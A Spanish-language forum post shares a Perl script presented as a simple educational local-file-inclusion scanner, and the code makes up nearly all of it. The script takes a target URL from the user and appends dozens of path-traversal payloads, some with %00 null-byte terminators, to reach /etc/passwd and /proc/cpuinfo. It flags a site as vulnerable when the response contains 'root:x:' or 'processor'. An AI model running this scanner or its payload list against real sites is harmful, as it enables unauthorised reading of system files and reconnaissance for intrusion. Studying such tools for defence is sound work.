Bueno Aqui les dejo un Escanner de LFI , Bastante simple y sencillo de entender para fines educativos y comenzar en la programacion en perl .
Cualquier comentario o consulta son bienvenidos.

Código:
#!/usr/bin/perl -W


#Coded by xshinee:
#blog.xshinee.cl
[email protected]


use LWP::UserAgent;
use strict;








system('clear');    #linux,  cls para windows.


print q (


 _____     ________  _____   
 |_   _|   |_   __  ||_   _|  
   | |       | |_ \_|  | |    
   | |   _   |  _|     | |    
  _| |__/ | _| |_     _| |_   
 |________||_____|   |_____|  
                                                       
Escaner Local File Include 
Url asi: http://host.com?blabla=                                              


);


print "\nIntroduce la Direccion a Buscar: ";


   chomp ( my $sitio = <STDIN> );








my @rutas = ('/etc/passwd',
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../..etc/passwd',
'../etc/passwd%00',
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../..etc/passwd%00',
'../proc/cpuinfo',
'../../proc/cpuinfo',
'../../../proc/cpuinfo',
'../../../../proc/cpuinfo',
'../../../../../proc/cpuinfo',
'../../../../../../proc/cpuinfo',
'../../../../../../../proc/cpuinfo',
'../../../../../../../../proc/cpuinfo',
'../../../../../../../../../proc/cpuinfo',
'../../../../../../../../../../proc/cpuinfo',
'../../../../../../../../../../../proc/cpuinfo');


print "\tBuscando el LFI\n\n";


my ( $pre, $out );




foreach $pre(@rutas){


my $url = $sitio.$pre;
my $busqueda = LWP::UserAgent->new() ;
my $buscador = $busqueda ->get($url) ;


if ($buscador->content =~ /root:x:/ || $buscador->content =~ /processor/) { 
 $out = "Posible LFI:"
 } else { 
 $out = "No Vulnerable";
 }


print "$pre =======> [$out]\n";
}